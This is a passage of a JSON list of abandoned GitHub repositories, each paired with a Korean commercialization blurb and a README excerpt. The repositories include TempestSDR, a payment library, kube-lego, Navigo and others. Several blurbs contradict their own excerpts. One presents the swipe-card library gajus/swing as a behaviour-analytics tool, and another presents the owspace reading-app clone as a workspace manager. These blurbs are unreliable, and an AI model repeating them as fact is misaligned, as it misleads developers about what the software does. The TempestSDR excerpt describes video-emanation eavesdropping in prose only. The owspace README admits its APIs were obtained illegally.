정기적인 보안 취약점 스캔 제공\n\n*","readme_excerpt":"TempestSDR\n=============\n\nThis project is a software toolkit for remotely eavesdropping video monitors using a Software Defined Radio (SDR) receiver. It exploits compromising emanations from cables carrying video signals.\n\nRaster video is usually transmitted one line of pixels at a time, encoded as a varying current. This generates an electromagnetic wave that can be picked up by an SDR receiver. The software maps the received field strength of a pixel to a gray-scale shade in real-time. This forms a false colour estimate of the original video signal.\n\nThe toolkit uses unmodified off-the-shelf hardware which lowers the costs and increases mobility compared to existing solutions. It allows for additional post-processing which improves the signal-to-noise ratio. The attacker does not need to have prior knowledge about the target video display. All parameters such as resolution and refresh rate are estimated with the aid of the software. \n\nThe software consists of a library written in C, ","composite_score":0.3107,"license_safety_tag":"restricted"},{"name":"Varorbc/ICanPay","github_url":"https://github.com/Varorbc/ICanPay","stars":6,"language":"C#","license":"mit","abandonment_months":66,"description":"# ICanPay 분석 보고서\n\n## 왜 보물인가\n온라인 가게나 앱에서 고객이 돈을 내는 과정을 간단하게 만들어주는 기술로, 결제 시스템을 직접 만들지 않아도 되어 개발 시간과 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 소규모 온라인 쇼핑몰 운영자가 자신의 가게에 결제 기능을 빠르게 추가할 수 있습니다.\n\n**내부","readme_excerpt":"# PaySharp<img src=\"https://github.com/Varorbc/PaySharp/raw/master/logo.png\" width=\"50px\" height=\"50px\">\n---\n\nPaySharp是一个支持多商户多种支付方式的跨平台网关处理类库，使用PaySharp可以简化订单的创建、查询、退款和接收网关返回的支付通知等操作。\n\n目前支持的支付网关有：支付宝(Alipay)、微信支付(Wechatpay)、中国银联(Unionpay)、QQ钱包支付(Qpay)、通联收银宝(Allinpay)\n\n### 1.支付宝：\n\n##### 支持的支付方式：\n\n\t移动支付(App)、手机网站支付(Wap)、电脑网站支付(Web)、小程序支付(Applet)、条码支付(Barcode)、扫码支付(Scan)\n\n##### 支持的辅助接口：\n\n\t查询、退款、退款查询、撤销、关闭、对账单下载、转账(Transfer)、转账查询(TransferQuery)\n\n### 2.微信：\n\n##### 支持的支付方式：\n\t\t\n\t移动支付(App)、手机网站支付(Wap)、公众号支付(Public)、小程序支付(Applet)、条码支付(Barcode)、扫码支付(Scan)\n\n##### 支持的辅助接口：\n\t\t\n\t查询、退款、退款查询、撤销、关闭、对账单下载、资金账单下载、\n\t\n\t转账(Transfer)、转账查询(TransferQuery)、转账到银行卡(TransferToBank)、转账到银行卡查询(TransferToBank)Query)\n\t\t\t\n### 3.银联：\n\n##### 支持的支付方式：\n\t\t\n\t移动支付(App)、手机网站支付(Wap)、电脑网站支付(Web)、条码支付(Barcode)、扫码支付(Scan)\n\n##### 支持的辅助接口：\n\t\t\n\t查询、退款、撤销、对账单下载\n\t\n### 4.QQ钱包：\n\n##### 支持的支付方式：\n\t\t\n\t移动支付(App)、公众号支付(Public)、条码支付(Barcode)、扫码支付(Scan)\n\n##### 支持的辅助接口：\n\t\t\n\t查询、退款、退款查询、撤销、关闭、对账单下载\n\n### 5.通联收银宝：\n\n##### 支持的支付方式：\n\t\t\n\t统一支付(Unified)、统一条码(","composite_score":0.3106,"license_safety_tag":"safe"},{"name":"jetstack/kube-lego","github_url":"https://github.com/jetstack/kube-lego","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":58,"description":"# kube-lego 분석 보고서\n\n## 왜 보물인가\n웹사이트 보안 인증서를 자동으로 발급하고 관리해주는 도구로, 기업들이 보안 유지에 드는 번거로운 수작업을 완전히 제거할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 다중 고객사 웹사이트를 운영하는 플랫폼에서 각 고객의 보안 인증서를 자동 관리하고 갱신하는 기능 제공\n2. **내","readme_excerpt":"# kube-lego\n\n>  :warning:\n>\n>  kube-lego is no longer maintained. The officially endorsed successor is **[cert-manager](https://github.com/jetstack/cert-manager/)**.\n>\n>  If you are a current user of kube-lego, you can find a migration guide [here](https://cert-manager.readthedocs.io/en/latest/tutorials/acme/migrating-from-kube-lego.html).\n>\n>  :warning:\n\n\n*kube-lego* automatically requests certificates for Kubernetes Ingress resources from Let's Encrypt\n\n[![Build Status](https://travis-ci.org/jetstack/kube-lego.svg?branch=master)](https://travis-ci.org/jetstack/kube-lego)\n[![](https://images.microbadger.com/badges/version/jetstack/kube-lego.svg)](http://microbadger.com/#/images/jetstack/kube-lego \"Get your own version badge on microbadger.com\")\n\n## Screencast\n\n[![Kube Lego screencast](https://asciinema.org/a/47444.png)](https://asciinema.org/a/47444)\n\n## Features\n\n- Recognizes the need of a new certificate for this cases:\n  - No certificate existing\n  - Existing certificate is not con","composite_score":0.3105,"license_safety_tag":"safe"},{"name":"bevacqua/es6","github_url":"https://github.com/bevacqua/es6","stars":5,"language":"","license":"mit","abandonment_months":109,"description":"# bevacqua/es6 저장소 분석\n\n## 왜 보물인가\n최신 웹 개발 기술 학습과 프로젝트 구축의 기초가 되는 자료로, 현대적인 웹 애플리케이션을 만드는 데 필수적인 코딩 방식을 체계적으로 정리한 교육용 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼 SaaS**: 프로그래밍 입문자를 위한 온라인 강의 또는 튜토리얼 구독 서비스로 활","readme_excerpt":"# ES6 Overview in 350 Bullet Points\n\nMy [ES6 in Depth][39] series consists of 24 articles covering most syntax changes and features coming in ES6. This article aims to summarize all of those, providing you with practical insight into most of ES6, so that you can quickly get started. I've also linked to the articles in ES6 in Depth so that you can easily go deeper on any topic you're interested in.\n\nI heard you like bullet points, so I made an article containing hundreds of those bad boys. To kick things off, here's a table of contents with all the topics covered. It has bullet points in it -- **obviously**. Note that if you want these concepts to permeate your brain, you'll have a much better time learning the subject by going through the [in-depth series][39] and playing around, experimenting with ES6 code yourself.\n\n![It's showtime!][40]\n\n# Table of Contents\n\n- [Introduction](#introduction)\n- [Tooling](#tooling)\n- [Assignment Destructuring](#assignment-destructuring)\n- [Spread Operat","composite_score":0.3104,"license_safety_tag":"safe"},{"name":"LeFullStack/FullStack","github_url":"https://github.com/LeFullStack/FullStack","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":55,"description":"# FullStack 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 처음부터 끝까지 만들 수 있는 완전한 틀을 제공하여, 누구나 빠르게 온라인 서비스를 시작할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 이 틀을 사용해 구독형 소프트웨어(예: 가계부 앱, 팀 협업 도구) 빠르게 출시\n- **내부 업무 도구**:","readme_excerpt":"<p align=\"center\">\n    <a href=\"http://fsblog.letec.top\">\n        <img width=\"200\" src=\"screenshots/logo.png\">\n    </a>\n</p>\n\n# FS-Blog\n\n\n\n[![Build Status](https://www.travis-ci.org/JamesZBL/FS-Blog.svg?branch=master)](https://www.travis-ci.org/JamesZBL/FS-Blog)\n[![LICENSE](https://img.shields.io/badge/license-Apache%202-brightgreen.svg)](http://www.apache.org/licenses/LICENSE-2.0.html)\n![GitHub release](https://img.shields.io/github/release/jameszbl/fs-blog.svg)\n\n\n## 基于 Spring Boot 的个人博客\n\n\n### 1. 涉及技术及工具\n\n- 核心框架：SpringBoot\n- ORM 框架：MyBatis\n- MyBatis 工具：MyBatis Mapper \n- MVC 框架：Spring MVC\n- 模板引擎：Freemarker\n- 编译辅助插件：Lombok\n- CSS 框架：BootStrap 4.0\n- Markdown 编辑器：Editor.md\n- 数据库：MySQL\n\n\n### 2. 效果图\n\n#### 2.1 首页\n![首页](screenshots/home.png)\n\n#### 2.2 博客列表页\n![文章列表](screenshots/posts.png)\n\n\n#### 2.3 博客阅读页\n![文章阅读](screenshots/blog.png)\n\n\n#### 2.4 个人简历页\n![个人简历](screenshots/resume.png)\n\n\n#### 2.5 文章编辑页\n![编辑器](screenshots/editor.png)\n\n\n### 3. 构建及运行\n\n#### 3.1 服务器环境\n\n- 安装 ``MySQL``\n- 安装 ``Gradle``\n- ","composite_score":0.3104,"license_safety_tag":"safe"},{"name":"egoist/poi","github_url":"https://github.com/egoist/poi","stars":11,"language":"JavaScript","license":"mit","abandonment_months":54,"description":"# egoist/poi 분석 보고서\n\n## 왜 보물인가\n간단한 설정만으로 웹사이트를 빠르게 만들 수 있는 도구로, 개발 경험이 없는 사람도 자신의 온라인 공간을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 블로그/포트폴리오 제작 플랫폼으로 월 구독료를 받으며 운영\n2. **내부 업무 도구**: 회사 내 문서화, 지식 ","readme_excerpt":"# ⚠️ Poi has been deprecated, please migrate to [Vite](https://vitejs.dev), contact me personally if you need help.\n\n<p align=\"center\">\n  <img src=\"https://i.loli.net/2018/09/12/5b98e77352c9d.png\" width=\"200\">\n  </p>\n<br>\n\n[![npm version](https://badgen.net/npm/v/poi)](https://npm.im/poi) [![build status](https://badgen.net/circleci/github/egoist/poi/master)](https://circleci.com/gh/egoist/poi/tree/master) [![npm downloads](https://badgen.net/npm/dm/poi)](https://npm.im/poi) [![poi twitter](https://badgen.net/badge//@poi__js/1da1f2?icon=twitter)](https://twitter.com/poi__js)\n\nPoi is a bundler built on the top of webpack, trying to make developing and bundling apps with webpack as easy as possible.\n\n**The Poi project is supported by our [Backers](./BACKERS.md) and funded through [Patreon](https://patreon.com/egoist).**\n\n## Features\n\n- 📦 Out of box support for JS, CSS, File assets and more.\n- ⚛ Framework-agnostic but also support JSX, Vue and more with no configs.\n- 🔌 Great extensibility","composite_score":0.3104,"license_safety_tag":"safe"},{"name":"bin456789/Unblock163MusicClient-Xposed","github_url":"https://github.com/bin456789/Unblock163MusicClient-Xposed","stars":8,"language":"Java","license":"unknown","abandonment_months":48,"description":"# bin456789/Unblock163MusicClient-Xposed 분석\n\n## 왜 보물인가\n중국 음악 스트리밍 서비스의 지역 제한을 우회하여 더 많은 곡을 들을 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 앱 개선 서비스**: 국내 음악 앱들이 해외 곡 추가 재생 기능을 프리미엄으로 제공\n2. **VPN/우회 기술 ","readme_excerpt":"# Unblock163MusicClient - Xposed\n~~Compatible with app version 4.3 to 6.1~~\n\n已弃坑，请使用 [nondanee/UnblockNeteaseMusic](https://github.com/nondanee/UnblockNeteaseMusic) 以及其 [衍生项目](https://github.com/nondanee/UnblockNeteaseMusic/issues/233#issuecomment-530774606)\n\n\n## Thanks\nThanks nondanee for his Node version [https://github.com/nondanee/UnblockNeteaseMusic]\n\nThanks EraserKing for his Original Windows version [https://github.com/EraserKing/Unblock163MusicClient]\n\nThanks yanunon for his API analysis [https://github.com/yanunon/NeteaseCloudMusic]","composite_score":0.3103,"license_safety_tag":"unknown"},{"name":"chanjarster/artemis-disruptor-miaosha","github_url":"https://github.com/chanjarster/artemis-disruptor-miaosha","stars":25,"language":"Java","license":"apache-2.0","abandonment_months":102,"description":"# artemis-disruptor-miaosha 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰에서 동시에 많은 사람이 물품을 사려고 할 때 시스템이 빠르고 안정적으로 처리할 수 있도록 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 명절 대세일이나 신상품 출시 때 수십만 명이 동시에 접속할 때 주문 처리 속도 향상\n- **티켓","readme_excerpt":"# artemis-disruptor-miaosha\n\n没有redis也能够支撑[\"小米在印度把亚马逊搞挂了\"事件](http://bbs.xiaomi.cn/t-13417592)的秒杀解决方案。\n\n> 小米在印度打破了多项记录：\n> 1. 4分钟内卖出了超过250,000台。 ---OPS:1042次抢购/S\n> 1. 成为最快的手机抢购活动。\n> 1. 抢购前我们收到了100万“到货提醒”。\n> 1. 亚马逊每分钟收到超过500万个点击。\n> 1. 亚马逊在这个期间每秒收到1500个订单（这是印度电商公司所有销售中最高的）。 ---OPS：1500次下单请求/S\n\n## 性能表现\n\n先说一下性能表现吧，因为大家对这个比较感兴趣。\n\n硬件环境(Tomcat、Artemis、Jmeter、Oracle，backend都在这台电脑上)：\n\n* MacBook Pro (Retina, 15-inch, Mid 2014)\n* 2.2 GHz Intel Core i7\n* 16 GB 1600 MHz DDR3\n* 512G SSD\n\n软件环境：\n\n* java version \"1.8.0_131\"\n* Artemis 1.5.4\n* Oracle XE 11g (Docker)\n* Tomcat 8.5.14 (1个)\n\n相关配置见[如何准备环境](Environment.md)\n\n测试Jmeter脚本见[如何Benchmark](Benchmark.md)：\n\n* 300线程，循环1000次，共30w请求\n\n一共Benchmark了两次，因为JIT的关系，第二次的性能表现更好。\n\n**第一次结果**\n\n* QPS：300000 in 00:01:57 = 2569.8/s Avg:   108 Min:     0 Max: 41102 Err:   164 (0.05%)\n* TPS：299836订单 ／ 121秒 = 2477条/s\n\nPS. 数据库表现从后端程序的日志中分析的。\n\n**第二次结果**\n\n不重启Tomcat和Artemis，把数据库的数据恢复后，重启了后端程序\n\n* QPS：300000 in 00:00:35 = 8527.8/s Avg:    20 Min:     0 Max:  4515 Err:     2 (0.00%)\n*","composite_score":0.3103,"license_safety_tag":"safe"},{"name":"krasimir/navigo","github_url":"https://github.com/krasimir/navigo","stars":22,"language":"TypeScript","license":"mit","abandonment_months":34,"description":"# Navigo 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 사용자가 페이지를 이동할 때 주소창의 URL을 자동으로 관리해주는 가벼운 도구로, 현대적인 웹사이트 개발에 필수적인 기능을 간단하게 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대시보드, 관리 도구 같은 복잡한 웹 애플리케이션에서 사용자가 뒤로가기/앞으로가기를 했을 때 올","readme_excerpt":"# Navigo\n\nA simple dependency-free minimalistic JavaScript router\n\n[![npm downloads](https://img.shields.io/npm/dm/navigo.svg?style=flat-square)](https://www.npmjs.com/package/navigo)\n![size](https://badgen.net/bundlephobia/minzip/react)\n\n* [v.8+ documentation](./DOCUMENTATION.md)\n* [v.7 documentation](./README_v7.md)\n* [Examples](./examples)\n* [Changelog](./CHANGELOG.md)\n* Using React? Checkout [navigo-react](https://github.com/krasimir/navigo-react) package.\n* 🎮  Online playground here [codesandbox.io/s/navigo-example-jrui8](https://codesandbox.io/s/navigo-example-jrui8);\n\n- [Navigo](#navigo)\n  - [Selling points](#selling-points)\n  - [Installation](#installation)\n  - [Quick start](#quick-start)\n  - [Development](#development)\n  - [Building](#building)\n  - [Tests](#tests)\n  - [MISC](#misc)\n\n## Selling points\n\n* Dependency free\n* ~10KB minified, ~4KB gzipped\n* Based on [History API](https://developer.mozilla.org/en-US/docs/Web/API/History_API) so it does update the URL of the page\n* Su","composite_score":0.3102,"license_safety_tag":"safe"},{"name":"Flipkart/recyclerlistview","github_url":"https://github.com/Flipkart/recyclerlistview","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":15,"description":"# Flipkart/recyclerlistview 분석\n\n## 왜 보물인가\n모바일 앱에서 대량의 데이터를 빠르고 부드럽게 표시하는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 앱 개발 서비스**: 쇼핑몰 앱에 상품 목록을 고속으로 렌더링하는 기능을 제공하는 SaaS\n2. **내부 인벤토리 관리 도구**: ","readme_excerpt":"# RecyclerListView\n\n[![npm version](https://img.shields.io/npm/v/recyclerlistview.svg)](https://www.npmjs.com/package/recyclerlistview)\n[![appveyor](https://ci.appveyor.com/api/projects/status/uwnp3r49127esj7k/branch/master?svg=true)](https://ci.appveyor.com/project/naqvitalha/recyclerlistview/branch/master)\n[![License](https://img.shields.io/badge/License-Apache%202.0-brightgreen.svg)](https://opensource.org/licenses/Apache-2.0)\n\nIf this project has helped you out, please support us with a star :star2:.\n\nThis is a high performance listview for React Native and Web with support for complex layouts. JS only with no native dependencies, inspired by both RecyclerView on Android\nand UICollectionView on iOS.\n\n`npm install --save recyclerlistview`\n\nFor latest beta:  \n`npm install --save recyclerlistview@beta`\n\n* **[Overview and features](#overview-and-features)**\n* **[Why?](#why)**\n* **[Demo](#demo)**\n* **[Props](#props)**\n* **[Typescript](#typescript)**\n* **[Guides](#guides)**\n* **[License]","composite_score":0.3101,"license_safety_tag":"safe"},{"name":"ikcamp/koa2-tutorial","github_url":"https://github.com/ikcamp/koa2-tutorial","stars":5,"language":"","license":"unknown","abandonment_months":80,"description":"# ikcamp/koa2-tutorial 상업화 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 데 필요한 기초 기술을 체계적으로 배울 수 있는 학습 자료로, 입문자용 교육 콘텐츠로 활용할 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 웹 개발 초급자를 위한 구독형 강의 콘텐츠로 제공\n2. **기업 신입사원 교육 도구**:","readme_excerpt":"<div align=\"center\">\n  <img src=\"./images/koa.png\"/>\n</div>   \n\n<h1 align=\"center\">基于Koa2搭建Node.js实战项目教程</h1>\n\n\n<h4 align=\"right\">🇨🇳  喜迎十九大 🇨🇳</h1>\n\n<br/>\n<br/>\n<br/>\n<br/>\n\n<div align=\"center\">\n  <img src=\"./images/develop-logo.png\"/>\n</div>   \n\n<br/>\n\n## 🇨🇳  与众不同的学习方式，为你打开新的编程视角 \n\n- 独特的『同步学习』方式  \n  - 文案讲解+视频演示，文字可激发深层的思考、视频可还原实战操作过程。 \n\n- 云集一线大厂有真正实力的程序员  \n  - iKcamp 团队云集一线大厂经验丰厚的码农，开源奉献各教程。  \n\n- 改版自真实的线上项目  \n  - 教程项目并非网上随意 `Demo`，而是来源于真实线上项目，并改版定制为教程项目\n\n- 源码开放  \n  - 课程案例代码完全开放给你，你可以根据所学知识自行修改、优化。\n\n<br/>\n\n<div align=\"center\">\n  <img src=\"./images/develop-nodejs.png\" width=\"250\"/>\n</div>\n\n<br/>\n\n## 🇨🇳  玩转 Node.js 同时全面掌握潮流技术 \n\n* 采用新一代的 Web 开发框架—— Koa2 ——更小、更富有表现力、更健壮。 \n\n* 使用 fs、buffer、http、path 等 Node.js 最核心 API。\n\n* 融合多种常见的需求场景：网络请求、JSON 解析、模板引擎、静态资源、日志记录、错误请求处理。 \n\n* 结合 async await (ES6/7) 语句中转中间件控制权，解决回调地狱问题。\n\n<br/>\n\n<div align=\"center\">\n  <img src=\"./images/develop-hero.png\" width=\"150\"/>\n</div>\n\n<br/>\n\n## 🇨🇳  适合人群及技术储备要求 \n> 如果你是一个有全栈梦想的前端开发者，或是想要入门 `Node.js`，那么来学习本课程，学完不仅实现你的全栈梦想，更让你","composite_score":0.31,"license_safety_tag":"unknown"},{"name":"babylikebird/owspace","github_url":"https://github.com/babylikebird/owspace","stars":12,"language":"Java","license":"unknown","abandonment_months":89,"description":"# owspace 상용화 분석\n\n## 왜 보물인가\n작업 공간을 효율적으로 관리하고 공유할 수 있는 도구로, 팀 협업이나 프로젝트 관리가 필요한 모든 조직에서 유용하게 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 팀의 프로젝트 작업 공간을 클라우드에서 관리하는 구독형 서비스\n- **내부 업무 도구**: 회사 내 부서별 작업","readme_excerpt":"# owspace\nowspace是基于MVP+Dagger2+Retrofit2.0+Rxjava的APP\n\n# 简介\nowspace是一款高仿单读的APP，API接口通过非法手段获取。<br>\n\n# 你能学到\n* MVP模式\n* Retrofit2.0 + rxjava\n* Dagger2\n* jsoup解析DOM\n* sqldelight SqlBrite\n* 音视频播放等\n* some fucking source code\n\n# 里程碑列表\n### 2018/3/27 升级API Level到27，各种依赖包全部升级\n### 2017/11/27 更新gradle、更新相关dependencies版本\n### 2016/11/25 添加音频播放\n### 2016/11/8 添加视频播放功能\n### 2016/11/4 添加新细明字体\n### 2016/10/28 Dagger2改造\n### 2016/7/21 初始化\n\n# demo\n\n[最新DEMO点击下载](https://beta.bugly.qq.com/5rik)\n\n\n# 展示\n![image](art/show1.png) ![image](art/show2.png)\n\n![image](art/show3.png) ![image](art/show4.png)\n\n![image](art/show5.png) ![image](art/show6.png)\n\n![image](art/show7.png) ![image](art/show8.png)\n\n![image](art/show.gif)\n\n# TODO LIST\n* sqldelight SqlBrite 缓存\n* 字体\n* 评论列表\n* some fucking features\n\n# 声明\n单读这个文艺的APP本人比较喜欢，一时冲动就抓取了数据，反编译了APP。so,API接口是通过非法手段获取，严禁商用，违者后果自负。<br>\n\n# thanks\n```\n    implementation fileTree(include: ['*.jar'], dir: 'libs')\n    implementation 'com.android.support:appcompat-v7:27.1.0'\n    implement","composite_score":0.31,"license_safety_tag":"unknown"},{"name":"gajus/swing","github_url":"https://github.com/gajus/swing","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":33,"description":"# gajus/swing 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자의 행동 패턴을 자동으로 기록하고 분석할 수 있는 도구로, 제품 개선에 필요한 실제 사용 데이터를 손쉽게 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 분석 서비스로, 중소 기업들이 고객 행동을 추적하는 월간 요금 모델로 운영\n2. **내","readme_excerpt":"# Swing\n\n[![GitSpo Mentions](https://gitspo.com/badges/mentions/gajus/swing?style=flat-square)](https://gitspo.com/mentions/gajus/swing)\n[![Travis build status](http://img.shields.io/travis/gajus/swing/master.svg?style=flat-square)](https://travis-ci.org/gajus/swing)\n[![NPM version](http://img.shields.io/npm/v/swing.svg?style=flat-square)](https://www.npmjs.org/package/swing)\n[![js-canonical-style](https://img.shields.io/badge/code%20style-canonical-blue.svg?style=flat-square)](https://github.com/gajus/canonical)\n\nA swipeable cards interface. The swipe-left/swipe-right for yes/no input. As seen in apps like [Jelly](http://jelly.co/) and [Tinder](http://www.gotinder.com/), and [many others](http://www.saydaily.com/2014/09/tinder-swipe-and-media).\n\nGive it a [swing](http://gajus.com/sandbox/swing/examples/card-stack/)! and please [tweet it](https://twitter.com/intent/retweet?tweet_id=527505589732405248) if you like it. : )\n\n![Card stack example.](./.README/card-stack.gif)\n\n## Contents\n\n*","composite_score":0.31,"license_safety_tag":"unknown"},{"name":"dbartolini/data-oriented-design","github_url":"https://github.com/dbartolini/data-oriented-design","stars":5,"language":"","license":"unknown","abandonment_months":28,"description":"# dbartolini/data-oriented-design 평가\n\n## 왜 보물인가\n컴퓨터 프로그램을 더 빠르고 효율적으로 만드는 설계 방법론에 대한 실제 사례와 코드를 정리한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대량의 데이터를 빠르게 처리해야 하는 분석 플랫폼이나 대시보드 서비스의 백엔드 개선\n2. **내부 업무 ","readme_excerpt":"# Data Oriented Design Resources\n\nA curated list of awesome data oriented design resources.\n\nFeel free to contribute by sending PR!\n\n- [Data Oriented Design](#data-oriented-design-resources)\n    - [Presentations](#presentations)\n    - [Blog Posts](#blog-posts)\n    - [Videos](#videos)\n    - [Other](#other)\n    - [Code Examples](#code-examples)\n\n## Presentations\n\n* [A Step Towards Data Orientation (2010)](http://www.slideshare.net/DICEStudio/a-step-towards-data-orientation) - Johan Torp\n* [Introduction To Data Oriented Design (2010)](http://www.slideshare.net/DICEStudio/introduction-to-data-oriented-design) - DICE\n* [Memory Optimization (2003)](https://www.slideshare.net/backkom/memory-optimization-212630?qid=900a4da7-e1dd-447f-bdbe-389ad83f3a0c) - Christer Ericson\n* [A Crash Course in Modern Hardware](https://www.infoq.com/presentations/click-crash-course-modern-hardware/) -  Dr. Cliff Click\n* [Practical Examples In Data Oriented Design (2013)](https://docs.google.com/presentation/d/17B","composite_score":0.31,"license_safety_tag":"unknown"},{"name":"fossasia/labs.fossasia.org","github_url":"https://github.com/fossasia/labs.fossasia.org","stars":5,"language":"CSS","license":"unknown","abandonment_months":43,"description":"# fossasia/labs.fossasia.org 분석\n\n## 왜 보물인가\n아시아의 오픈소스 커뮤니티가 만든 기술 프로젝트들을 한곳에서 관리하고 공유할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자들을 위한 오픈소스 프로젝트 포트폴리오 관리 및 공유 플랫폼\n2. **내부 업무 도구**: 기술 커뮤니티가 진행 중인 ","readme_excerpt":"[![Build Status](https://travis-ci.org/fossasia/labs.fossasia.org.svg?branch=gh-pages)](https://travis-ci.org/fossasia/labs.fossasia.org)\n\n## labs.fossasia.org\n\nCode of website: http://labs.fossasia.org\n","composite_score":0.3099,"license_safety_tag":"unknown"},{"name":"FE-Driver/vue-beauty","github_url":"https://github.com/FE-Driver/vue-beauty","stars":5,"language":"JavaScript","license":"mit","abandonment_months":27,"description":"# vue-beauty 프로젝트 분석\n\n## 왜 보물인가\n웹사이트를 쉽게 만들 수 있도록 도와주는 디자인 부품 모음으로, 개발자의 작업 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 빠르게 관리자 페이지나 대시보드를 만들어야 하는 스타트업이 구독\n- **내부 업무 도구**: 기업의 직원 관리, 재고 관리 등 사내 시","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://github.com/FE-Driver/vue-beauty\">\n        <img width=\"200\" src=\"https://raw.githubusercontent.com/FE-Driver/vue-beauty/master/src/assets/VB-logo.png\">\n    </a>\n</p>\n\n# vue-beauty [![npm](http://img.shields.io/npm/v/vue-beauty.svg)](https://www.npmjs.com/package/vue-beauty) [![NPM downloads](http://img.shields.io/npm/dm/vue-beauty.svg)](https://www.npmjs.com/package/vue-beauty) [![MIT License](https://img.shields.io/github/license/mashape/apistatus.svg)](https://www.npmjs.com/package/vue-beauty)\nBeautiful  UI components build with vue and ant design\n\n## 特性\n- 丰富的组件，涵盖常用场景\n- 基于vue组件化开发，数据驱动视图\n- 封装复杂性，提供简单友好的api\n- 基于ant design样式优化\n\n## 引入\n使用npm或者yarn\n```\nnpm install vue-beauty -S  OR  yarn add vue-beauty\n\nimport Vue from 'vue'\n//import css\nimport 'vue-beauty/package/style/vue-beauty.min.css'\n\n//import components\nimport vueBeauty from 'vue-beauty'\nVue.use(vueBeauty)\n\n//OR\nimport {alert} from 'vue-beauty'\nVue.use(alert)\n```\n或使用 &lt;script&gt; 全局引用\n```\n<","composite_score":0.3099,"license_safety_tag":"safe"},{"name":"you-dont-need/You-Dont-Need-GUI","github_url":"https://github.com/you-dont-need/You-Dont-Need-GUI","stars":5,"language":"","license":"unknown","abandonment_months":30,"description":"# You-Dont-Need-GUI 분석\n\n## 왜 보물인가\n마우스 클릭 대신 명령어로 컴퓨터를 더 빠르고 효율적으로 조작하는 방법을 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 생산성 향상 플랫폼 - 명령어 학습 커뮤니티 운영\n2. **내부 업무 도구**: 기업 IT 교육 시스템 - 신입 직원 온보딩 프","readme_excerpt":"# You Don't Need GUI\n\n[![Join the community on Spectrum](https://withspectrum.github.io/badge/badge.svg)](https://spectrum.chat/you-dont-need/GUI)\n\n[中文版请看这里](./readme-zh_CN.md)\n\n<details>\nIt's for noobs :)\n</details>\n<br />\n\nGraphical user interfaces are super friendly to computer users. They were introduced in reaction to the perceived steep learning curve of command-line interfaces (CLIs).\n\n![Xerox Star 8010 workstations](./Xerox_Star_8010_workstations.jpg)\n\nHowever, they often require more resources, are less powerful and hard to automate via scripting.\n\nAs a computer expert, we want to be more efficient and do our jobs better. We know that command words may not be easily discoverable or mnemonic, so we try to list some common tasks that you might be tempted to do in GUI.\n\n## Quick links\n\n1. [copy a file](#copy-a-file)\n1. [duplicate a file](#duplicate-a-file)\n1. [copy a directory](#copy-a-directory)\n1. [duplicate a directory](#duplicate-a-directory)\n1. [move a file](#move-a-file)\n1.","composite_score":0.3098,"license_safety_tag":"unknown"},{"name":"eldraco/domain_analyzer","github_url":"https://github.com/eldraco/domain_analyzer","stars":9,"language":"Python","license":"unknown","abandonment_months":41,"description":"# Domain Analyzer 상용화 분석\n\n## 왜 보물인가\n웹사이트 주소를 분석해서 보안 위험이나 신뢰도를 자동으로 판단해주는 도구로, 사이버 사기나 악성 사이트 피해를 예방하고 싶어 하는 기업들에게 매우 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 보안 SaaS**: 직원들이 받은 의심스러운 링크를 자동으로 검사해서 악성 사이트 클","readme_excerpt":"# Domain Analyzer v0.8.3\n\n![GitHub last commit (branch)](https://img.shields.io/github/last-commit/eldraco/domain_analyzer)\n![example workflow](https://github.com/eldraco/domain_analyzer/actions/workflows/docker-image.yml/badge.svg)\n![example workflow](https://github.com/eldraco/domain_analyzer/actions/workflows/codeql-analysis.yml/badge.svg)\n![Docker Pulls](https://img.shields.io/docker/pulls/verovaleros/domain_analyzer?color=green)\n[![Branch Maintenance](https://img.shields.io/badge/Branch%20Maintained%3F-sometimes-orange.svg)](https://bitbucket.org/lbesson/ansi-colors)\n\n## What\nDomain analyzer is a security analysis tool that automatically discovers and reports information about a given domain. Its main purpose is to analyze domains in an unattended way.\nIt has many crazy features, such as getting more domains from DNS zones, automatic nmap, webcrawler, and world domination mode. Check the features.\n\nIf you want nmap to scan more ports and run scripts and to run the crawler on those","composite_score":0.3097,"license_safety_tag":"unknown"},{"name":"JoshOrndorff/blockchain-from-scratch","github_url":"https://github.com/JoshOrndorff/blockchain-from-scratch","stars":234,"language":"Rust","license":"NOASSERTION","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.3096,"license_safety_tag":"unknown"},{"name":"adafruit/Adafruit_TCS34725","github_url":"https://github.com/adafruit/Adafruit_TCS34725","stars":167,"language":"C++","license":"NOASSERTION","abandonment_months":30,"description":"# Adafruit TCS34725 색상 센서 라이브러리 분석\n\n## 왜 보물인가\n색상을 감지하는 센서를 